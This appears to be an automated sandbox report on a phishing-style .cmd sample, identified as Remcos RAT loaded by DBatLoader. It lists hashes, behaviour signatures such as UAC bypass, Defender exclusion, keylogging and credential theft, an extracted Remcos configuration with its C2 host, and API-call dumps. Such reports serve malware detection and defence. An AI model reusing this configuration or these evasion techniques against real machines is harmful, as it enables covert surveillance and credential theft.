Windows Analysis Report
Purchase Order is approved26042024.cmd

Overview

General Information

Sample name: Purchase Order is approved26042024.cmd
Analysis ID: 1432341
MD5: 8d5ff3734fb8dddaf133ff8ef662aa1d
SHA1: 08f0f2978d3c989b0b6ce03a804a6b0cfc0453b6
SHA256: 0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c
Tags: cmd

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: http://geoplugin.net/json.gp/C URL Reputation: Label: phishing
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp URL Reputation: Label: phishing
Source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "^www.pentegrasystem.com:9231:0", "Assigned name": "NEWRemoteHost-APRILFILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3A6IQD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Yara match File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA18DC CertFindExtension,CryptDecodeObject,GetLastError,#357, 25_2_00007FF67DEA18DC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBB8D0 I_CryptGetLruEntryData,#357, 25_2_00007FF67DEBB8D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357, 25_2_00007FF67DEA9878
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE67884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree, 25_2_00007FF67DE67884
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError, 25_2_00007FF67DED3860
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache, 25_2_00007FF67DEBD850
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree, 25_2_00007FF67DEC184C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry, 25_2_00007FF67DEBB808
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree, 25_2_00007FF67DE6F810
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree, 25_2_00007FF67DEFF7FC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree, 25_2_00007FF67DEE97E4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE717D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree, 25_2_00007FF67DE717D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError, 25_2_00007FF67DED37A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEEB794 CryptExportPublicKeyInfoEx,SetLastError, 25_2_00007FF67DEEB794
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224, 25_2_00007FF67DE4B788
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree, 25_2_00007FF67DE6D790
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA577C #360,#358,CryptDecodeObject,GetLastError,#357, 25_2_00007FF67DEA577C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree, 25_2_00007FF67DE9F774
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DED5768
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357, 25_2_00007FF67DEFD750
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree, 25_2_00007FF67DE6B324
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash, 25_2_00007FF67DEBD30C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE6D304
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DECF2F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext, 25_2_00007FF67DEA92D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext, 25_2_00007FF67DEB32D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 25_2_00007FF67DF093A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE992C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary, 25_2_00007FF67DE992C4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358, 25_2_00007FF67DE9B2B4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError, 25_2_00007FF67DED32A8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF07290 NCryptIsKeyHandle,#359,#360,#357,#358, 25_2_00007FF67DF07290
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358, 25_2_00007FF67DEFD28C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6D240 #357,CryptFindOIDInfo,#357,LocalFree, 25_2_00007FF67DE6D240
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF07214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError, 25_2_00007FF67DF07214
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF071C8 BCryptDestroyKey,#360, 25_2_00007FF67DF071C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED11C8 NCryptVerifySignature,#205,#357,#357,#357,#357, 25_2_00007FF67DED11C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError, 25_2_00007FF67DED31C0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DEA51A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError, 25_2_00007FF67DEB3188
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF07178 BCryptCloseAlgorithmProvider,#360, 25_2_00007FF67DF07178
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey, 25_2_00007FF67DEBF168
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree, 25_2_00007FF67DEB5164
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE93504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle, 25_2_00007FF67DE93504
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError, 25_2_00007FF67DED34F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF014F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext, 25_2_00007FF67DF014F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEEB4EC CryptDecodeObjectEx,SetLastError, 25_2_00007FF67DEEB4EC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFF4A0 CryptHashPublicKeyInfo,SetLastError, 25_2_00007FF67DEFF4A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree, 25_2_00007FF67DEBF488
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DED9480
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF29208 #357,NCryptEnumKeys,#360,#358, 25_2_00007FF67DF29208
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEEB464 CryptEncodeObjectEx,SetLastError, 25_2_00007FF67DEEB464
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE35438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree, 25_2_00007FF67DE35438
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError, 25_2_00007FF67DED342C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree, 25_2_00007FF67DF0141C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE913F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext, 25_2_00007FF67DE913F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB53E8 CryptEncodeObjectEx,GetLastError,#357, 25_2_00007FF67DEB53E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357, 25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357, 25_2_00007FF67DEE33B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB33A0 CryptVerifyCertificateSignature,CertCompareCertificateName, 25_2_00007FF67DEB33A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError, 25_2_00007FF67DF0739C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError, 25_2_00007FF67DED3390
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString, 25_2_00007FF67DE5B36C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357, 25_2_00007FF67DE8B350
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE95338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext, 25_2_00007FF67DE95338
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE67340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree, 25_2_00007FF67DE67340
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06F2C NCryptExportKey,#360, 25_2_00007FF67DF06F2C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE68F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError, 25_2_00007FF67DE68F1C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357, 25_2_00007FF67DED0EF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360, 25_2_00007FF67DF06EA8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFEE94 CryptSignMessage,SetLastError, 25_2_00007FF67DEFEE94
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE70E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext, 25_2_00007FF67DE70E94
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree, 25_2_00007FF67DEA2E7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree, 25_2_00007FF67DED2E6C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06E48 NCryptSetProperty,#360, 25_2_00007FF67DF06E48
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE60E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE60E24
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06DE0 NCryptCreatePersistedKey,#360, 25_2_00007FF67DF06DE0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree, 25_2_00007FF67DEB4DDC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0DD4 NCryptGetProperty,#205,#359,#357,#359,#357, 25_2_00007FF67DED0DD4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree, 25_2_00007FF67DEF8DD0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02DAC #357,#357,CryptFindOIDInfo,LocalFree, 25_2_00007FF67DF02DAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0D84 NCryptFreeObject,#205,#357, 25_2_00007FF67DED0D84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06D78 NCryptOpenKey,#360, 25_2_00007FF67DF06D78
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError, 25_2_00007FF67DED2D78
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE89134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore, 25_2_00007FF67DE89134
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF07124 BCryptGenerateKeyPair,#360, 25_2_00007FF67DF07124
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree, 25_2_00007FF67DEF511C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED10D8 NCryptSetProperty,#205,#359,#357,#359,#357, 25_2_00007FF67DED10D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError, 25_2_00007FF67DED30D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF070C8 BCryptSetProperty,#360, 25_2_00007FF67DF070C8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF20DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357, 25_2_00007FF67DF20DB8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DEDB0A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357, 25_2_00007FF67DE9B098
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree, 25_2_00007FF67DE7107C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0705C BCryptGetProperty,#360, 25_2_00007FF67DF0705C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED1058 NCryptOpenStorageProvider,#205,#359,#357, 25_2_00007FF67DED1058
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection, 25_2_00007FF67DE4302F
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE47034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext, 25_2_00007FF67DE47034
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree, 25_2_00007FF67DEC9028
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DED7020
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError, 25_2_00007FF67DED301C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF14E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360, 25_2_00007FF67DF14E58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0700C BCryptEnumAlgorithms,#360, 25_2_00007FF67DF0700C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0FB4 NCryptOpenKey,#205,#359,#357,#357, 25_2_00007FF67DED0FB4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06FAC BCryptOpenAlgorithmProvider,#360, 25_2_00007FF67DF06FAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF30ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359, 25_2_00007FF67DF30ED0
